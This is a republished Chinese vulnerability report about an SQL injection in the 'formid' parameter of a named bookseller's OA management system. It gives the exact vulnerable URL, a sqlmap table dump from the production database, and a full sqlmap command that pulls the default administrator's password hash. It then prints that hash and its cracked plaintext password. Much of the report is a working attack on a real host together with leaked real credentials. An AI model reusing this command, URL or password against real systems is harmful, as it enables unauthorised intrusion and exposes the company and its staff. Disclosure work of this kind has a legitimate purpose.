神刀安全网

漏洞标题: 文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

漏洞详情

披露状态:

2016-05-03: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

今天下楼的时候顺便丢垃圾,丢垃圾的时候发现一个包装袋,上面写着文轩网。然后回来就测试了一下,没想到引发了一场场血案啊

详细说明:

今天下楼的时候顺便丢垃圾,丢垃圾的时候发现一个包装袋,上面写着文轩网。然后回来就测试了一下,没想到引发了一场场血案啊

code 区域
oa.winxuan.com

code 区域
http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1

formid存在注入

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

350个库啊,因为sqlmap不能直接显示出来,还是找日记一个一个手动排列的,就冲我这精神给20分吧。

code 区域
JSP
back-end DBMS: Oracle
Database: OAUSER

+--------------------------------+---------+

| Table | Entries |

+--------------------------------+---------+

|SCORE | 17936023 |

| PERMISSIONLINKDOCBASE | 6342260 |

| LOG | 5749886 |

| PERMISSIONDETAILDOCBASE | 5503371 |

| SCORETMP | 1244885 |

| PERMISSIONDETAILWORKFLOWBASE | 304448 |

| PERMISSIONLINKWORKFLOWBASE | 293734 |

| PERMISSIONRULEDOCBASE | 262420 |

| PERMISSIONRULEWORKFLOWBASE | 262310 |

| WORKFLOWSTEPFINISHED | 183342 |

| WORKFLOWINFOFINISHED | 180505 |

| WORKFLOWOPERATORSFINISHED | 140586 |

| WORKFLOWLOGFINISHED | 125355 |

| ATTACH | 66960 |

| DOCATTACH | 54522 |

| WORKFLOWSTEP | 39600 |

| WORKFLOWINFO | 39180 |

| CATEGORYLINK | 38055 |

| DOCBASE | 35292 |

| PASSWORDHISTORY | 29312 |

| WORKFLOWLOG | 28212 |

| UFG7S2O41194588032176T | 27140 |

| EVENT | 19384 |

| WORKFLOWBASE | 15421 |

| PERMISSIONLINKPORTALCHANNALS | 15264 |

| PERMISSIONDETAILPORTALCHANNALS | 15249 |

| UFF7K8K61221633602612T | 13844 |

| UFJ3W3S41221633547510T | 13831 |

| UFL0X4U31236061379146T | 12725 |

| UFG3W9A31191920098875T | 12613 |

| LABEL | 11655 |

| UFG0Y5L41221633619659T | 11579 |

| UFA1Z8W21221633655798T | 9747 |

| UFH3E4W91191919765921T | 8970 |

| RTXU | 8194 |

| UFC4K0G21221633874179T | 8038 |

| FORMLAYOUTFIELD | 7956 |

| SYSUSER | 7922 |

| LABEL_NEW | 7859 |

| HUMRES | 7855 |

| SYSUSER_BAK | 7844 |

| HUMRES_BAK | 7777 |

| WORKFLOWOPERATORS | 7491 |

| UFW1C6R51221634541611T | 6319 |

| RTXUN | 6146 |

| UFG7S2O41194588032176 | 5869 |

| UFF2G8A01191907781421T | 5721 |

| HUMRES_BACK | 5572 |

| HUMRESTEMP | 5163 |

| STATIONINFO | 4112 |

| Z1 | 3892 |

| DOCINDIV | 3743 |

| STATIONLINK | 3491 |

| FORMFIELD | 3029 |

| UFG3W9A31191920098875 | 2857 |

| UFD1I6Q41194245212565 | 2695 |

| CATEGORY | 2435 |

| SELECTITEM | 2397 |

| UFG9O1U31427268735994T | 2397 |

| UFW1J9T61269934662222T | 2344 |

| IF_HUMRES | 2226 |

| UFH3E4W91191919765921 | 2166 |

| UFF2G8A01191907781421 | 2114 |

| UFA1Z8W21221633655798 | 1899 |

| UFF7K8K61221633602612 | 1899 |

| UFC4K0G21221633874179 | 1896 |

| UFW1C6R51221634541611 | 1896 |

| UFG0Y5L41221633619659 | 1894 |

| UFJ3W3S41221633547510 | 1894 |

| UFL0X4U31236061379146 | 1740 |

| UFZ1I5F91427270259217T | 1688 |

| IF_STATIONINFO | 1462 |

| ORGUNIT | 1332 |

| UFW4F2G21430722144985T | 1322 |

| KHZSJ | 1262 |

| UFJ4I3S41200992843804T | 1080 |

| UFA5Y7Z81200990289777T | 1078 |

| UFL2N6H71200991289728T | 1078 |

| UFY2Z9J91200993227970T | 1078 |

| UFO5T9B31200993254436T | 1077 |

| ORGUNITLINK | 1058 |

| UFN4Q0D91201065966034T | 1054 |

| BOOKSHEET | 1050 |

| SAPQQ | 1032 |

| RTXP | 1000 |

| UFI2T4P31385011501902T | 976 |

| ZZ | 963 |

| UFH4O4P21434439724854 | 955 |

| UFY3X5U21214977469835T | 903 |

| BB | 789 |

| UFE3V0Z41436239651329T | 752 |

| UNLOCKUSER | 698 |

| EXPORT | 677 |

| UFW1J9T61269934662222 | 640 |

| DR | 609 |

| NODEINFO | 592 |

| UFW4F2G21430722144985 | 539 |

| PIPENODESTYLE | 536 |

| UFT6Y0E21239169073156T | 525 |

| REMINDLOG | 498 |

| RYDRXX_BAK | 459 |

| UFR8V0S31201592887615T | 440 |

| REPORTFIELD | 437 |

| UFU4Q6L41193280564254T | 433 |

| DOCTYPE | 394 |

| REFOBJLINK | 364 |

| FORMLAYOUT | 361 |

| DIVPOSITION | 360 |

| MAILACCOUNT | 348 |

| REMINDRECEIVEOBJ | 337 |

| UFI2T4P31385011501902 | 336 |

| PERMISSIONLINKREPORTDEF | 334 |

| PORTALMODULES | 325 |

| UFG9O1U31427268735994 | 319 |

| UFZ1I5F91427270259217 | 319 |

| PERMISSIONDETAILREPORTDEF | 316 |

| PORTALCHANPARAMODULES | 286 |

| UFA2Q4C21193281172154T | 275 |

| MENU | 274 |

| MENUORG | 266 |

| PORTALMODULECONFIG | 256 |

| SELECTITEMTYPE | 253 |

| REMARK | 252 |

| UFF8U9E81395122755353T | 247 |

| UFE3V0Z41436239651329 | 243 |

| WBSTASKHISTORY | 235 |

| REPORTSEARCHFIELD | 226 |

| PERMISSIONRULEREPORTDEF | 211 |

| MYPERMITBAG | 210 |

| UFJ4I3S41200992843804 | 192 |

| UFA5Y7Z81200990289777 | 191 |

| UFL2N6H71200991289728 | 191 |

| UFO5T9B31200993254436 | 191 |

| UFY2Z9J91200993227970 | 191 |

| WBSDOCFLOW | 191 |

| UFN4Q0D91201065966034 | 188 |

| PERMISSIONRULEPORTALCHANNALS | 173 |

| UFK5R2Q01193282788864T | 167 |

| UFR8V0S31201592887615 | 167 |

| DELOBJ | 165 |

| IF_ORGUNIT | 163 |

| WBSTASK | 149 |

| FORMINFO | 147 |

| PORTALCHANPARAS | 144 |

| RYDRXX_BAK_1222 | 138 |

| UFY7Y3C31209373252583T | 131 |

| SYSRESOURCE | 126 |

| PAGEMENU | 117 |

| KMTOPIC | 115 |

| PORTAL | 107 |

| SYSUSERROLELINK | 106 |

| UFP6J3X91262843817858T | 104 |

| PIPEINFO | 102 |

| REMINDMESSAGEDETAIL | 97 |

| REMINDSENDOBJ | 97 |

| UFY3X5U21214977469835 | 97 |

| KMMAPTOPICLINK | 94 |

| SYSPERMRESLINK | 93 |

| PERMITBAG | 92 |

| UFY3T6F71193289145697T | 90 |

| SETITEM | 89 |

| HUMRESCUSTOMIZE | 85 |

| FORMLINK | 84 |

| SUBJECT | 84 |

| TEMP3 | 84 |

| UFS6J0V21186643740812T | 80 |

| UFY7Y3C31209373252583 | 79 |

| SEARCHCUSTOMIZEOPTION | 78 |

| TEMP1 | 75 |

| TEMP2 | 75 |

| CONTEMPFIELD | 74 |

| UFC4H0T11193280596918T | 70 |

| HHH | 67 |

| PERMISSIONRULEPIPEINFO | 65 |

| REFOBJ | 60 |

| WBSTASKTEMPLATE | 60 |

| UFA2Q4C21193281172154 | 58 |

| UFM8L3N01210227759384T | 58 |

| UFK5R2Q01193282788864 | 57 |

| UFC4H0T11193280596918 | 56 |

| UFU4Q6L41193280564254 | 56 |

| UFY3T6F71193289145697 | 56 |

| ADDRESSINFO | 51 |

| GYSZSJ | 51 |

| PERMISSIONLINKPROJECT | 50 |

| PERMISSIONDETAILPROJECT | 49 |

| UFQ9H8S71395725696697T | 49 |

| UFB5N0R31434341886193 | 47 |

| UFG5H0M21319164636037T | 47 |

| UFK4H5T01278382941766T | 47 |

| PIPEACCREDIT | 46 |

| ORGUNITTYPE | 44 |

| UFT6Y0E21239169073156 | 44 |

| RYDRXX | 43 |

| UFM2Y4U41210226662879T | 42 |

| REPORTDEF | 41 |

| SYSROLEPERMLINK | 41 |

| UFE3W8V51196906858771 | 41 |

| UFE3W8V51196906858771T | 41 |

| SELFCUSTOM | 37 |

| UFB9T5N81395985987280T | 36 |

| UFO3X9Z31395725358932T | 36 |

| AA | 35 |

| PORTALTOPIC | 35 |

| PORTALCHANNALS | 33 |

| UFE4O5K91191920595703T | 33 |

| UFX6P3U41214807405359T | 33 |

| UFP6J3X91262843817858 | 31 |

| UFS6J0V21186643740812 | 31 |

| UFF8U9E81395122755353 | 30 |

| UFE3Q6S51228892267536T | 28 |

| UFK4H5T01278382941766 | 27 |

| GYSZSJ_BAK | 25 |

| PERMISSIONRULEPROJECT | 24 |

| UFE3Q6S51228892267536 | 24 |

| UFT8H8N31319164144745T | 23 |

| UFE4O5K91191920595703 | 22 |

| UFR9F9Z51276157442595 | 22 |

| UFR9F9Z51276157442595T | 22 |

| AUTHORIZEOPERATION | 20 |

| UFQ9H8S71395725696697 | 20 |

| KMMAP | 19 |

| UFM8L3N01210227759384 | 19 |

| SYSPERMS | 18 |

| SYSROLE | 18 |

| UFG5H0M21319164636037 | 18 |

| WORKFLOWAUTHORIZELOG | 18 |

| UFU4M7L61205906651800T | 16 |

| UFC2N9R01208923738836T | 13 |

| FAVLIST | 12 |

| SETITEMTYPE | 12 |

| UFM2Y4U41210226662879 | 12 |

| UFQ0S2A91259133802297T | 12 |

| UFX6P3U41214807405359 | 12 |

| USERMENU | 12 |

| UFB4P7W91208923277799T | 11 |

| STATIONLEVELLINK | 10 |

| REMINDRULE | 9 |

| UFJ8Z6G41426816778795T | 9 |

| UFO3X9Z31395725358932 | 9 |

| UFT8H8N31319164144745 | 9 |

| VERSIONINFO | 9 |

| KHZSJ_BAK | 8 |

| PIPEDOCTYPE | 8 |

| UFB9T5N81395985987280 | 8 |

| UFC4B3Q21185525667890T | 8 |

| UFQ0S2A91259133802297 | 8 |

| ADDRESSSHEETMAP | 7 |

| SEARCHCUSTOMIZE | 7 |

| UFH2S6L11237441705568T | 7 |

| PORTALTOPICLINK | 6 |

| PROJECT | 6 |

| UDTYPE | 6 |

| UFL7E7V61259822162376T | 6 |

| UFP3K1Q01267680510921T | 6 |

| UFU4M7L61205906651800 | 6 |

| WBSVERSION | 6 |

| ATTACHMENT | 5 |

| CONTEMPLATE | 5 |

| CONTRACTTYPE | 5 |

| KEYINFO | 5 |

| UFC3H4A91228892239311T | 5 |

| UFC4B3Q21185525667890 | 5 |

| UFC4C3V21193888200526 | 5 |

| UFC4C3V21193888200526T | 5 |

| UFG1K2C01237771698639T | 5 |

| UFJ8Z6G41426816778795 | 5 |

| UFP3K1Q01267680510921 | 5 |

| PERMISSIONRULECUSTOMER | 4 |

| PERMISSIONRULEPRODUCT | 4 |

| PROJECTTYPE | 4 |

| UFC2N9R01208923738836 | 4 |

| UFL7E7V61259822162376 | 4 |

| UFT1Q4K71237184297382T | 4 |

| UFW4W9S01237184235289T | 4 |

| WORKFLOWAGENTINFO | 4 |

| AUTHTICKETINFO | 3 |

| UFB4P7W91208923277799 | 3 |

| UFG9Z3X81392010172464T | 3 |

| UFI3J3D61186471722328T | 3 |

| UFJ6Y6W11319179657036 | 3 |

| UFZ3K0Z41237875272949T | 3 |

| WBSINFO | 3 |

| WORKFLOWAUTHORIZE | 3 |

| PERMISSIONDETAILCONTRACT | 2 |

| PERMISSIONLINKCONTRACT | 2 |

| PERMISSIONLINKCUSTOMER | 2 |

| PERMISSIONLINKPRODUCT | 2 |

| PERMISSIONRULECONTRACT | 2 |

| REFOBJMODEL | 2 |

| UFD1Y7I61319173459654 | 2 |

| UFI3J3D61186471722328 | 2 |

| AAA | 1 |

| ASSETSTYPE | 1 |

| CUSTOMERTYPE | 1 |

| ID_RECODE_DONTDELETE | 1 |

| MAP | 1 |

| PERMISSIONDETAILASSETS | 1 |

| PERMISSIONDETAILCUSTOMER | 1 |

| PERMISSIONDETAILPRODUCT | 1 |

| PERMISSIONDETAILPROVIDER | 1 |

| PERMISSIONLINKASSETS | 1 |

| PERMISSIONLINKPROVIDER | 1 |

| PERMISSIONRULEASSETS | 1 |

| PERMISSIONRULEMODEL | 1 |

| PERMISSIONRULEPROVIDER | 1 |

| PRODUCTTYPE | 1 |

| PROVIDERTYPE | 1 |

| SHOPTYPE | 1 |

| UFC3H4A91228892239311 | 1 |

| UFD1Y7I61319173459654T | 1 |

| UFE6F0Y01186643861921 | 1 |

| UFE6F0Y01186643861921T | 1 |

| UFG1K2C01237771698639 | 1 |

| UFH2S6L11237441705568 | 1 |

| UFJ6Y6W11319179657036T | 1 |

| UFS6Z2C81395646749424 | 1 |

| UFS6Z2C81395646749424T | 1 |

| UFT1Q4K71237184297382 | 1 |

| UFV3W4W41395647003213 | 1 |

| UFV3W4W41395647003213T | 1 |

| UFW4W9S01237184235289 | 1 |

| UFZ3K0Z41237875272949 | 1 |

+--------------------------------+---------+

因为表太多,不知道管理员账户是那个。可以利用语句直接在sqlmap中查询。

默认管理员是sysadmin

code 区域
C:/Python27/sqlmap>sqlmap.py -u "http://oa.winxuan.com/ServiceAction/com.velcro.
base.GetDataAction?action=checkname&formid=1" -p formid --tamper=space2comment -
-batch -D zuzhibu -T sysuser --sql-query "select logonpass from sysuser where lo
ngonname='sysadmin'"

code 区域
e3570e9e977fabb2ac818edc9a6a2e38

解密后为asdlkj321

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

5000名后台管理信息

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

小学管理系统,可以看视频等。。

大量敏感信息

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

点到即止,么么哒

漏洞证明:

点到即止,么么哒

漏洞标题:  文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

修复方案:

版权声明:转载请注明来源 DeadSea@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址